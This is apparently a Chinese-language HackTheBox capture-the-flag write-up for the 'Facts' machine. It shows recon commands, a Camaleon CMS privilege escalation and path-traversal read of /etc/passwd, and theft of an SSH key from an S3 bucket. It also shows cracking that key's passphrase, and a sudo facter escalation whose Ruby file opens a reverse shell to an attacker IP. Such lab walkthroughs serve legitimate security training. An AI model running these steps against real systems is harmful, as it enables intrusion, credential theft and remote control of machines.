HTB赛季10 - Facts

前言

各位小伙伴,赛季10开启了,但是我最近实在太忙,实在没心情将图片拖进来了,可能会影响大家的阅读体验,但这同时也是锻炼各位的机会哈哈哈。之后空闲下来,会恢复文章品质的。Sorry啦。

复制代码
10.129.18.81

nmap扫描

复制代码
sudo nmap --top-ports 10000 10.129.18.81 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.18.81 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.18.81 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.18.81 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

![[Pasted image 20260201201638.png]]

扫描vhost

复制代码
ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://facts.htb/ -H 'Host: FUZZ.facts.htb' -mc all -fw 18

ffuf -w test.txt:FUZZ -u http://facts.htb/FUZZ  -mc all -fw 1248

![[Pasted image 20260201203127.png]]

我们进入/admin页面并创建用户

![[Pasted image 20260201203159.png]]

Camaleon CMS - N day 漏洞 - 任意文件读取 & Web账户提权到Admin

成功进入页面

![[Pasted image 20260201203228.png]]

该页面告诉我们了N day漏洞 https://www.tenable.com/security/research/tra-2025-09 ,经过分析我获取了administrator权限,其只要原因是updated_ajax的权限控制存在缺失导致的,会将所有的password里面的内容全部信任。

![[Pasted image 20260201205350.png]]

![[Pasted image 20260201205337.png]]

我们接着发现了一个桶服务器

![[Pasted image 20260201210833.png]]

我们配置aws准备访问

复制代码
aws configure --profile htb

aws s3 ls --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 cp s3://internal/.ssh/id_ed25519 ./ --profile htb  --endpoint-url http://10.129.18.81:54321

![[Pasted image 20260201210930.png]]

我们提取一下谁使用这个密钥

复制代码
grep -v '\-\-' id_ed25519|base64 -d|strings

可惜没有任何信息,我们去网页搜集所有用户名

复制代码
Bob
Carol
Dave

我们进一步覆盖authorized_keys

复制代码
aws s3 cp ./authorized_keys s3://internal/.ssh/authorized_keys --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 ls internal/.ssh/ --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 ls internal --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 cp s3://randomfacts/* ./ --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 sync s3://internal ./internal \
  --profile htb \
  --endpoint-url http://10.129.18.81:54321

我们并没有找到用户名字,我们继续查看CMS的漏洞情况,发现存在路径遍历漏洞

![[Pasted image 20260201220217.png]]

复制代码
http://facts.htb/admin/media/download_private_file?file=../../../../../../etc/passwd

我们尝试登录

![[Pasted image 20260201220246.png]]

复制代码
ssh -i id_ed25519 trivia@facts.htb 

![[Pasted image 20260201220324.png]]

我们在云里面曾经写入了authorized_keys文件,所以我们尝试用自己的私钥登录

复制代码
ssh -i ~/.ssh/id_ed25519 trivia@facts.htb 

aws s3 ls internal/.ssh/ --profile htb  --endpoint-url http://10.129.18.81:54321

我们进一步查看,发现云里面的只是复制内容。我们只能破解id_ed25519

复制代码
ssh2john id_ed25519
john hash --wordlist=/home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt

![[Pasted image 20260201220959.png]]

复制代码
dragonballz

我们发现,该指令会执行/tmp目录下的第一个rb文件

复制代码
sudo /usr/bin/facter --custom-dir=/tmp/ x

所以我们编写RB文件放在/tmp下即可

复制代码
#!/usr/bin/env ruby

puts "Hello, Ruby"
spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.17.114",80))

然后执行

复制代码
sudo /usr/bin/facter --custom-dir=/tmp/ x
相关推荐
路溪非溪15 分钟前
详解下DNS协议
网络·网络协议·tcp/ip·智能路由器
CHANG_THE_WORLD16 分钟前
<Fluent Python > 2. 第二章:序列的数组
网络·windows·python
byoass17 分钟前
企业云盘API集成指南:如何与CI/CD流水线打通
网络·安全·ci/cd·云计算
大卡片32 分钟前
TCP、IP和TFTP协议
服务器·网络·tcp/ip
网络安全许木33 分钟前
自学渗透测试第29天(Linux SUID/SGID基础实验)
linux·运维·服务器·web安全·渗透测试
汽车仪器仪表相关领域34 分钟前
Kvaser Memorator Professional HS/LS:高速 + 低速双通道 CAN 总线记录仪,跨系统诊断的专业级解决方案
网络·人工智能·功能测试·测试工具·安全·压力测试
sxdtzhp35 分钟前
软件接口日限额实现方法与实践
安全·接口·日限额
JiaWen技术圈35 分钟前
conntrack-tools 用法
linux·运维·服务器·安全·运维开发
AI周红伟41 分钟前
周红伟:OpenClaw安全防控:OpenClaw+Skills+私有大模型安全部署、实操和企业应用实操
大数据·人工智能·深度学习·安全·copilot·openclaw
菩提小狗43 分钟前
每日安全情报报告 · 2026-04-29
网络安全·漏洞·cve·安全情报·每日安全